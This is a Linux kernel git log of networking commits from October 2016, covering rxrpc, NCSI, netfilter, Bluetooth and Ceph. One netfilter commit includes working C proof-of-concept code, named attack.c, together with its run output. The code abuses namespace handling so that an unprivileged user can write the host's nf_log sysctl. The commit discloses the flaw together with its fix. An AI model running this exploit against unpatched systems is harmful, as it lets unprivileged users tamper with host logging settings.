  nsfs: add ioctl to get a parent namespace
  nsfs: add ioctl to get an owning user namespace for ns file descriptor
  kernel: add a helper to get an owning user namespace for a namespace
  devpts: Change the owner of /dev/pts/ptmx to the mounter of /dev/pts
  devpts: Remove sync_filesystems
  devpts: Make devpts_kill_sb safe if fsi is NULL
  devpts: Simplify devpts_mount by using mount_nodev
  devpts: Move the creation of /dev/pts/ptmx into fill_super
  devpts: Move parse_mount_options into fill_super
  userns: When the per user per user namespace limit is reached return ENOSPC
  userns; Document per user per user namespace limits.
  mntns: Add a limit on the number of mount namespaces.
  netns: Add a limit on the number of net namespaces
  cgroupns: Add a limit on the number of cgroup namespaces
  ipcns: Add a  limit on the number of ipc namespaces
  ...
2016-10-06 09:52:23 -07:00
Michał Narajowski
1b42206665 Bluetooth: Refactor append name and appearance
Use eir_append_data to remove code duplication.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-10-06 11:52:29 +02:00
Michał Narajowski
7ddb30c747 Bluetooth: Add appearance to default scan rsp data
Add appearance value to beginning of scan rsp data for
default advertising instance if the value is not 0.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-10-06 11:52:29 +02:00
Michał Narajowski
cecbf3e932 Bluetooth: Fix local name in scan rsp
Use complete name if it fits. If not and there is short name
check if it fits. If not then use shortened name as prefix
of complete name.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-10-06 11:52:29 +02:00
David Howells
bf7d620abf rxrpc: Don't request an ACK on the last DATA packet of a call's Tx phase
Don't request an ACK on the last DATA packet of a call's Tx phase as for a
client there will be a reply packet or some sort of ACK to shift phase.  If
the ACK is requested, OpenAFS sends a REQUESTED-ACK ACK with soft-ACKs in
it and doesn't follow up with a hard-ACK.

If we don't set the flag, OpenAFS will send a DELAY ACK that hard-ACKs the
reply data, thereby allowing the call to terminate cleanly.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:51 +01:00
David Howells
9749fd2bea rxrpc: Need to produce an ACK for service op if op takes a long time
We need to generate a DELAY ACK from the service end of an operation if we
start doing the actual operation work and it takes longer than expected.
This will hard-ACK the request data and allow the client to release its
resources.

To make this work:

 (1) We have to set the ack timer and propose an ACK when the call moves to
     the RXRPC_CALL_SERVER_ACK_REQUEST and clear the pending ACK and cancel
     the timer when we start transmitting the reply (the first DATA packet
     of the reply implicitly ACKs the request phase).

 (2) It must be possible to set the timer when the caller is holding
     call->state_lock, so split the lock-getting part of the timer function
     out.

 (3) Add trace notes for the ACK we're requesting and the timer we clear.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:50 +01:00
David Howells
cf69207afa rxrpc: Return negative error code to kernel service
In rxrpc_kernel_recv_data(), when we return the error number incurred by a
failed call, we must negate it before returning it as it's stored as
positive (that's what we have to pass back to userspace).

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:50 +01:00
David Howells
94bc669efa rxrpc: Add missing notification
The call's background processor work item needs to notify the socket when
it completes a call so that recvmsg() or the AFS fs can deal with it.
Without this, call expiry isn't handled.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:50 +01:00
David Howells
d7833d0091 rxrpc: Queue the call on expiry
When a call expires, it must be queued for the background processor to deal
with otherwise a service call that is improperly terminated will just sit
there awaiting an ACK and won't expire.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:50 +01:00
David Howells
b3156274ca rxrpc: Partially handle OpenAFS's improper termination of calls
OpenAFS doesn't always correctly terminate client calls that it makes -
this includes calls the OpenAFS servers make to the cache manager service.
It should end the client call with either:

 (1) An ACK that has firstPacket set to one greater than the seq number of
     the reply DATA packet with the LAST_PACKET flag set (thereby
     hard-ACK'ing all packets).  nAcks should be 0 and acks[] should be
     empty (ie. no soft-ACKs).

 (2) An ACKALL packet.

OpenAFS, though, may send an ACK packet with firstPacket set to the last
seq number or less and soft-ACKs listed for all packets up to and including
the last DATA packet.

The transmitter, however, is obliged to keep the call live and the
soft-ACK'd DATA packets around until they're hard-ACK'd as the receiver is
permitted to drop any merely soft-ACK'd packet and request retransmission
by sending an ACK packet with a NACK in it.

Further, OpenAFS will also terminate a client call by beginning the next
client call on the same connection channel.  This implicitly completes the
previous call.

This patch handles implicit ACK of a call on a channel by the reception of
the first packet of the next call on that channel.

If another call doesn't come along to implicitly ACK a call, then we have
to time the call out.  There are some bugs there that will be addressed in
subsequent patches.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
a5af7e1fc6 rxrpc: Fix loss of PING RESPONSE ACK production due to PING ACKs
Separate the output of PING ACKs from the output of other sorts of ACK so
that if we receive a PING ACK and schedule transmission of a PING RESPONSE
ACK, the response doesn't get cancelled by a PING ACK we happen to be
scheduling transmission of at the same time.

If a PING RESPONSE gets lost, the other side might just sit there waiting
for it and refuse to proceed otherwise.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
26cb02aa6d rxrpc: Fix warning by splitting rxrpc_send_call_packet()
Split rxrpc_send_data_packet() to separate ACK generation (which is more
complicated) from ABORT generation.  This simplifies the code a bit and
fixes the following warning:

In file included from ../net/rxrpc/output.c:20:0:
net/rxrpc/output.c: In function 'rxrpc_send_call_packet':
net/rxrpc/ar-internal.h:1187:27: error: 'top' may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/rxrpc/output.c:103:24: note: 'top' was declared here
net/rxrpc/output.c:225:25: error: 'hard_ack' may be used uninitialized in this function [-Werror=maybe-uninitialized]

Reported-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
a9f312d98a rxrpc: Only ping for lost reply in client call
When a reply is deemed lost, we send a ping to find out the other end
received all the request data packets we sent.  This should be limited to
client calls and we shouldn't do this on service calls.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
7212a57e8e rxrpc: Fix oops on incoming call to serviceless endpoint
If an call comes in to a local endpoint that isn't listening for any
incoming calls at the moment, an oops will happen.  We need to check that
the local endpoint's service pointer isn't NULL before we dereference it.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
19c0dbd540 rxrpc: Fix duplicate const
Remove a duplicate const keyword.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:48 +01:00
David Howells
b63452c11e rxrpc: Accesses of rxrpc_local::service need to be RCU managed
struct rxrpc_local->service is marked __rcu - this means that accesses of
it need to be managed using RCU wrappers.  There are two such places in
rxrpc_release_sock() where the value is checked and cleared.  Fix this by
using the appropriate wrappers.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:48 +01:00
David S. Miller
5bfb88a163 Merge git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next
Pablo Neira Ayuso says:

====================
Netfilter fixes for net-next

This is a pull request to address fallout from previous nf-next pull
request, only fixes going on here:

1) Address a potential null dereference in nf_unregister_net_hook()
   when becomes nf_hook_entry_head is NULL, from Aaron Conole.

2) Missing ifdef for CONFIG_NETFILTER_INGRESS, also from Aaron.

3) Fix linking problems in xt_hashlimit in x86_32, from Pai.

4) Fix permissions of nf_log sysctl from unpriviledge netns, from
   Jann Horn.

5) Fix possible divide by zero in nft_limit, from Liping Zhang.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-05 20:15:55 -04:00
Ilya Dryomov
64f77566e1 crush: remove redundant local variable
Remove extra x1 variable, it's just temporary placeholder that
clutters the code unnecessarily.

Reflects ceph.git commit 0d19408d91dd747340d70287b4ef9efd89e95c6b.

Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
2016-10-05 23:02:10 +02:00
Ilya Dryomov
74a5293832 crush: don't normalize input of crush_ln iteratively
Use __builtin_clz() supported by GCC and Clang to figure out
how many bits we should shift instead of shifting by a bit
in a loop until the value gets normalized. Improves performance
of this function by up to 3x in worst-case scenario and overall
straw2 performance by ~10%.

Reflects ceph.git commit 110de33ca497d94fc4737e5154d3fe781fa84a0a.

Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
2016-10-05 23:02:04 +02:00
Johannes Berg
1e1430d528 Merge remote-tracking branch 'net-next/master' into mac80211-next
Resolve the merge conflict between Felix's/my and Toke's patches
coming into the tree through net and mac80211-next respectively.
Most of Felix's changes go away due to Toke's new infrastructure
work, my patch changes to "goto begin" (the label wasn't there
before) instead of returning NULL so flow control towards drivers
is preserved better.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-04 09:46:44 +02:00
Liping Zhang
2fa46c1301 netfilter: nft_limit: fix divided by zero panic
After I input the following nftables rule, a panic happened on my system:
  # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second

  divide error: 0000 [#1] SMP
  [ ... ]
  RIP: 0010:[<ffffffffa059035e>]  [<ffffffffa059035e>]
  nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
  Call Trace:
  [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables]
  [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
  [<ffffffff81753767>] ? ipt_do_table+0x327/0x610
  [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
  [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
  [<ffffffff816f4aa2>] nf_iterate+0x62/0x80
  [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0
  [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0
  [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0
  [<ffffffff81703d3c>] ip_local_out+0x1c/0x40

This is because divisor is 64-bit, but we treat it as a 32-bit integer,
then 0xf00000000 becomes zero, i.e. divisor becomes 0.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-04 08:59:03 +02:00
Jann Horn
dbb5918cb3 netfilter: fix namespace handling in nf_log_proc_dostring
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
        int fd = open(path, O_WRONLY);
        if (fd == -1)
                err(1, "unable to open thing");
        if (write(fd, buf, strlen(buf)) != strlen(buf))
                err(1, "unable to write thing");
        close(fd);
}

int child_fn(void *p_) {
        if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                  NULL))
                err(1, "mount");

        /* Yes, we need to set the maps for the net sysctls to recognize us
         * as namespace root.
         */
        char buf[1000];
        sprintf(buf, "0 %d 1\n", (int)outer_uid);
        writefile("/proc/1/uid_map", buf);
        writefile("/proc/1/setgroups", "deny");
        sprintf(buf, "0 %d 1\n", (int)outer_gid);
        writefile("/proc/1/gid_map", buf);

        stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
        if (stolen_fd == -1)
                err(1, "open nf_log");
        return 0;
}

int main(void) {
        outer_uid = getuid();
        outer_gid = getgid();

        int child = clone(child_fn, child_stack + sizeof(child_stack),
                          CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                          |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
        if (child == -1)
                err(1, "clone");
        int status;
        if (wait(&status) != child)
                err(1, "wait");
        if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                errx(1, "child exit status bad");

        char *data = "NONE";
        if (write(stolen_fd, data, strlen(data)) != strlen(data))
                err(1, "write");
        return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-04 08:41:06 +02:00
Gavin Shan
c0cd1ba4f8 net/ncsi: Introduce ncsi_stop_dev()
This introduces ncsi_stop_dev(), as counterpart to ncsi_start_dev(),
to stop the NCSI device so that it can be reenabled in future. This
API should be called when the network device driver is going to
shutdown the device. There are 3 things done in the function: Stop
the channel monitoring; Reset channels to inactive state; Report
NCSI link down.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:51 -04:00
Gavin Shan
83afdc6aad net/ncsi: Rework the channel monitoring
The original NCSI channel monitoring was implemented based on a
backoff algorithm: the GLS response should be received in the
specified interval. Otherwise, the channel is regarded as dead
and failover should be taken if current channel is an active one.
There are several problems in the implementation: (A) On BCM5718,
we found when the IID (Instance ID) in the GLS command packet
changes from 255 to 1, the response corresponding to IID#1 never
comes in. It means we cannot make the unfair judgement that the
channel is dead when one response is missed. (B) The code's
readability should be improved. (C) We should do failover when
current channel is active one and the channel monitoring should
be marked as disabled before doing failover.

This reworks the channel monitoring to address all above issues.
The fields for channel monitoring is put into separate struct
and the state of channel monitoring is predefined. The channel
is regarded alive if the network controller responses to one of
two GLS commands or both of them in 5 seconds.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:51 -04:00
Gavin Shan
a0509cbeef net/ncsi: Allow to extend NCSI request properties
There is only one NCSI request property for now: the response for
the sent command need drive the workqueue or not. So we had one
field (@driven) for the purpose. We lost the flexibility to extend
NCSI request properties.

This replaces @driven with @flags and @req_flags in NCSI request
and NCSI command argument struct. Each bit of the newly introduced
field can be used for one property. No functional changes introduced.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Gavin Shan
a15af54f8f net/ncsi: Rework request index allocation
The NCSI request index (struct ncsi_request::id) is put into instance
ID (IID) field while sending NCSI command packet. It was designed the
available IDs are given in round-robin fashion. @ndp->request_id was
introduced to represent the next available ID, but it has been used
as number of successively allocated IDs. It breaks the round-robin
design. Besides, we shouldn't put 0 to NCSI command packet's IID
field, meaning ID#0 should be reserved according section 6.3.1.1
in NCSI spec (v1.1.0).

This fixes above two issues. With it applied, the available IDs will
be assigned in round-robin fashion and ID#0 won't be assigned.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Gavin Shan
55e02d0837 net/ncsi: Don't probe on the reserved channel ID (0x1f)
We needn't send CIS (Clear Initial State) command to the NCSI
reserved channel (0x1f) in the enumeration. We shouldn't receive
a valid response from CIS on NCSI channel 0x1f.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Gavin Shan
bc7e0f50aa net/ncsi: Introduce NCSI_RESERVED_CHANNEL
This defines NCSI_RESERVED_CHANNEL as the reserved NCSI channel
ID (0x1f). No logical changes introduced.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Gavin Shan
d8cedaabe7 net/ncsi: Avoid unused-value build warning from ia64-linux-gcc
xchg() is used to set NCSI channel's state in order for consistent
access to the state. xchg()'s return value should be used. Otherwise,
one build warning will be raised (with -Wunused-value) as below message
indicates. It is reported by ia64-linux-gcc (GCC) 4.9.0.

 net/ncsi/ncsi-manage.c: In function 'ncsi_channel_monitor':
 arch/ia64/include/uapi/asm/cmpxchg.h:56:2: warning: value computed is \
 not used [-Wunused-value]
  ((__typeof__(*(ptr))) __xchg((unsigned long) (x), (ptr), sizeof(*(ptr))))
   ^
 net/ncsi/ncsi-manage.c:202:3: note: in expansion of macro 'xchg'
  xchg(&nc->state, NCSI_CHANNEL_INACTIVE);

This removes the atomic access to NCSI channel's state avoid the above
build warning. We have to hold the channel's lock when its state is readed
or updated. No functional changes introduced.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Andrew Collins
93409033ae net: Add netdev all_adj_list refcnt propagation to fix panic
This is a respin of a patch to fix a relatively easily reproducible kernel
panic related to the all_adj_list handling for netdevs in recent kernels.

The following sequence of commands will reproduce the issue:

ip link add link eth0 name eth0.100 type vlan id 100
ip link add link eth0 name eth0.200 type vlan id 200
ip link add name testbr type bridge
ip link set eth0.100 master testbr
ip link set eth0.200 master testbr
ip link add link testbr mac0 type macvlan
ip link delete dev testbr

This creates an upper/lower tree of (excuse the poor ASCII art):

            /---eth0.100-eth0
mac0-testbr-
            \---eth0.200-eth0

When testbr is deleted, the all_adj_lists are walked, and eth0 is deleted twice from
the mac0 list. Unfortunately, during setup in __netdev_upper_dev_link, only one
reference to eth0 is added, so this results in a panic.

This change adds reference count propagation so things are handled properly.

Matthias Schiffer reported a similar crash in batman-adv:

https://github.com/freifunk-gluon/gluon/issues/680
https://www.open-mesh.org/issues/247

which this patch also seems to resolve.

Signed-off-by: Andrew Collins <acollins@cradlepoint.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:05:31 -04:00
Shmulik Ladkani
b6a7920848 net: skbuff: Limit skb_vlan_pop/push() to expect skb->data at mac header
skb_vlan_pop/push were too generic, trying to support the cases where
skb->data is at mac header, and cases where skb->data is arbitrarily
elsewhere.

Supporting an arbitrary skb->data was complex and bogus:
 - It failed to unwind skb->data to its original location post actual
   pop/push.
   (Also, semantic is not well defined for unwinding: If data was into
    the eth header, need to use same offset from start; But if data was
    at network header or beyond, need to adjust the original offset
    according to the push/pull)
 - It mangled the rcsum post actual push/pop, without taking into account
   that the eth bytes might already have been pulled out of the csum.

Most callers (ovs, bpf) already had their skb->data at mac_header upon
invoking skb_vlan_pop/push.
Last caller that failed to do so (act_vlan) has been recently fixed.

Therefore, to simplify things, no longer support arbitrary skb->data
inputs for skb_vlan_pop/push().

skb->data is expected to be exactly at mac_header; WARN otherwise.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Daniel Borkmann <daniel@iogearbox.net>
Cc: Pravin Shelar <pshelar@ovn.org>
Cc: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 21:41:40 -04:00
Shmulik Ladkani
f39acc84aa net/sched: act_vlan: Push skb->data to mac_header prior calling skb_vlan_*() functions
Generic skb_vlan_push/skb_vlan_pop functions don't properly handle the
case where the input skb data pointer does not point at the mac header:

- They're doing push/pop, but fail to properly unwind data back to its
  original location.
  For example, in the skb_vlan_push case, any subsequent
  'skb_push(skb, skb->mac_len)' calls make the skb->data point 4 bytes
  BEFORE start of frame, leading to bogus frames that may be transmitted.

- They update rcsum per the added/removed 4 bytes tag.
  Alas if data is originally after the vlan/eth headers, then these
  bytes were already pulled out of the csum.

OTOH calling skb_vlan_push/skb_vlan_pop with skb->data at mac_header
present no issues.

act_vlan is the only caller to skb_vlan_*() that has skb->data pointing
at network header (upon ingress).
Other calles (ovs, bpf) already adjust skb->data at mac_header.

This patch fixes act_vlan to point to the mac_header prior calling
skb_vlan_*() functions, as other callers do.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Daniel Borkmann <daniel@iogearbox.net>
Cc: Pravin Shelar <pshelar@ovn.org>
Cc: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 21:40:50 -04:00
Al Viro
25869262ef skb_splice_bits(): get rid of callback
since pipe_lock is the outermost now, we don't need to drop/regain
socket locks around the call of splice_to_pipe() from skb_splice_bits(),
which kills the need to have a socket-specific callback; we can just
call splice_to_pipe() and be done with that.

Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
2016-10-03 20:40:56 -04:00
Ilya Dryomov
464691bd52 libceph: ceph_build_auth() doesn't need ceph_auth_build_hello()
A static bug finder (EBA) on Linux 4.7:

    Double lock in net/ceph/auth.c
    second lock at 108: mutex_lock(& ac->mutex); [ceph_auth_build_hello]
    after calling from 263: ret = ceph_auth_build_hello(ac, msg_buf, msg_len);
    if ! ac->protocol -> true at 262
    first lock at 261: mutex_lock(& ac->mutex); [ceph_build_auth]

ceph_auth_build_hello() is never called, because the protocol is always
initialized, whether we are checking existing tickets (in delayed_work())
or getting new ones after invalidation (in invalidate_authorizer()).

Reported-by: Iago Abal <iari@itu.dk>
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
2016-10-03 16:13:50 +02:00
Ilya Dryomov
fdc723e77b libceph: use CEPH_AUTH_UNKNOWN in ceph_auth_build_hello()
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
2016-10-03 16:13:50 +02:00
David S. Miller
7667d445fa RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV+7Zg/Sw1s6N8H32AQIprA//ewnCeNT3m53au7molP/KWgqkTUJYXjW0
 tdUjebDGB50UyFVj+f/oHowu4ylYg6DiCjkfidr7Mc1ngnzJjgZUGOIq4OACFa5H
 lVfUM9okpSKWz61/ljq0Li70j4HscFVC3efXyfF25vTeCpqKSxtqNypwOB4KE5fu
 hv2a5IxBJnY4XVKNhC94NiqZ7SFmtb6RPk/M8Tm9rB0C4haq3WGH2Fp5iobcs3+F
 8u+UPOPZ+n2UAWMCxg8os4iDi2Uec0sQRPVZZbbTQN2uwzjZS1Jqx/Wf5Fbz0C9x
 mV7N9HtKEznt7HTo0pUN6B1kEE3GbkFnCDUTASclg5CkN0G1ptB3QdFv22UCyoNK
 9DvfUUWR+TGnLlrwyzaxBCcg1Cz2YgPahoowMD5iTA8IpLbB51beyeL09N6w+iPO
 BpqYd31y3ie3qH3FYYJdsAxCtYvRvABme+D3GHvlbleVMBRqbNAxt0JZxghK4IfX
 P4qw+L6ylNZTDO10bgZpJyGDe9kvxy/kuHiid7jYTuRdyHwt2RoRJGKMAQinDDpV
 XJHfMXQKbSIoCfMNN7aWv08BMxIrXmkwDQAdf2XVcy9sGy1yDnMCxdKqcXNX19ax
 Co86ZHz9t8kJ/Um3v1wEo77T2/JP4CuqvbN/nMcU3Ll/u2tPyDXzqs7xWkdSdV7W
 GC4AdqT3LAo=
 =dmH+
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20160930' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: More fixes and adjustments

This set of patches contains some more fixes and adjustments:

 (1) Actually display the retransmission indication previously added to the
     tx_data trace.

 (2) Switch to Congestion Avoidance mode properly at cwnd==ssthresh rather
     than relying on detection during an overshoot and correction.

 (3) Reduce ssthresh to the peer's declared receive window.

 (4) The offset field in rxrpc_skb_priv can be dispensed with and the error
     field is no longer used.  Get rid of them.

 (5) Keep the call timeouts as ktimes rather than jiffies to make it easier
     to deal with RTT-based timeout values in future.  Rounding to jiffies
     is still necessary when the system timer is set.

 (6) Fix the call timer handling to avoid retriggering of expired timeout
     actions.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 02:02:17 -04:00
Jiri Benc
85de4a2101 openvswitch: use mpls_hdr
skb_mpls_header is equivalent to mpls_hdr now. Use the existing helper
instead.

Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 02:00:22 -04:00
Jiri Benc
9095e10edd mpls: move mpls_hdr to a common location
This will be also used by openvswitch.

Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: David Ahern <dsa@cumulusnetworks.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 02:00:21 -04:00
Jiri Benc
f7d49bce8e openvswitch: mpls: set network header correctly on key extract
After the 48d2ab609b ("net: mpls: Fixups for GSO"), MPLS handling in
openvswitch was changed to have network header pointing to the start of the
MPLS headers and inner_network_header pointing after the MPLS headers.

However, key_extract was missed by the mentioned commit, causing incorrect
headers to be set when a MPLS packet just enters the bridge or after it is
recirculated.

Fixes: 48d2ab609b ("net: mpls: Fixups for GSO")
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 02:00:21 -04:00
Arnd Bergmann
fa34cd94fb net: rtnl: avoid uninitialized data in IFLA_VF_VLAN_LIST handling
With the newly added support for IFLA_VF_VLAN_LIST netlink messages,
we get a warning about potential uninitialized variable use in
the parsing of the user input when enabling the -Wmaybe-uninitialized
warning:

net/core/rtnetlink.c: In function 'do_setvfinfo':
net/core/rtnetlink.c:1756:9: error: 'ivvl$' may be used uninitialized in this function [-Werror=maybe-uninitialized]

I have not been able to prove whether it is possible to arrive in
this code with an empty IFLA_VF_VLAN_LIST block, but if we do,
then ndo_set_vf_vlan gets called with uninitialized arguments.

This adds an explicit check for an empty list, making it obvious
to the reader and the compiler that this cannot happen.

Fixes: 79aab093a0 ("net: Update API for VF vlan protocol 802.1ad support")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Reviewed-by: Moshe Shemesh <moshe@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 01:31:48 -04:00
Paolo Abeni
63d75463c9 net: pktgen: fix pkt_size
The commit 879c7220e8 ("net: pktgen: Observe needed_headroom
of the device") increased the 'pkt_overhead' field value by
LL_RESERVED_SPACE.
As a side effect the generated packet size, computed as:

	/* Eth + IPh + UDPh + mpls */
	datalen = pkt_dev->cur_pkt_size - 14 - 20 - 8 -
		  pkt_dev->pkt_overhead;

is decreased by the same value.
The above changed slightly the behavior of existing pktgen users,
and made the procfs interface somewhat inconsistent.
Fix it by restoring the previous pkt_overhead value and using
LL_RESERVED_SPACE as extralen in skb allocation.
Also, change pktgen_alloc_skb() to only partially reserve
the headroom to allow the caller to prefetch from ll header
start.

v1 -> v2:
 - fixed some typos in the comments

Fixes: 879c7220e8 ("net: pktgen: Observe needed_headroom of the device")
Suggested-by: Ben Greear <greearb@candelatech.com>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 01:29:57 -04:00
Maciej Żenczykowski
cb9e684e89 ipv6 addrconf: remove addrconf_sysctl_hop_limit()
This is an effective no-op in terms of user observable behaviour.

By preventing the overwrite of non-null extra1/extra2 fields
in addrconf_sysctl() we can enable the use of proc_dointvec_minmax().

This allows us to eliminate the constant min/max (1..255) trampoline
function that is addrconf_sysctl_hop_limit().

This is nice because it simplifies the code, and allows future
sysctls with constant min/max limits to also not require trampolines.

We still can't eliminate the trampoline for mtu because it isn't
actually a constant (it depends on other tunables of the device)
and thus requires at-write-time logic to enforce range.

Signed-off-by: Maciej Żenczykowski <maze@google.com>
Acked-by: Erik Kline <ek@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-02 23:48:13 -04:00
Stefan Agner
d4ef9f7212 netfilter: bridge: clarify bridge/netfilter message
When using bridge without bridge netfilter enabled the message
displayed is rather confusing and leads to belive that a deprecated
feature is in use. Use IS_MODULE to be explicit that the message only
affects users which use bridge netfilter as module and reword the
message.

Signed-off-by: Stefan Agner <stefan@agner.ch>
Acked-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-02 22:44:03 -04:00
David S. Miller
b50afd203a Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Three sets of overlapping changes.  Nothing serious.

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-02 22:20:41 -04:00
Tyler Hicks
d6169b0206 net: Use ns_capable_noaudit() when determining net sysctl permissions
The capability check should not be audited since it is only being used
to determine the inode permissions. A failed check does not indicate a
violation of security policy but, when an LSM is enabled, a denial audit
message was being generated.

The denial audit message caused confusion for some application authors
because root-running Go applications always triggered the denial. To
prevent this confusion, the capability check in net_ctl_permissions() is
switched to the noaudit variant.

BugLink: https://launchpad.net/bugs/1465724

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Serge E. Hallyn <serge.hallyn@ubuntu.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
[dtor: reapplied after e79c6a4fc9 ("net: make net namespace sysctls
belong to container's owner") accidentally reverted the change.]
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
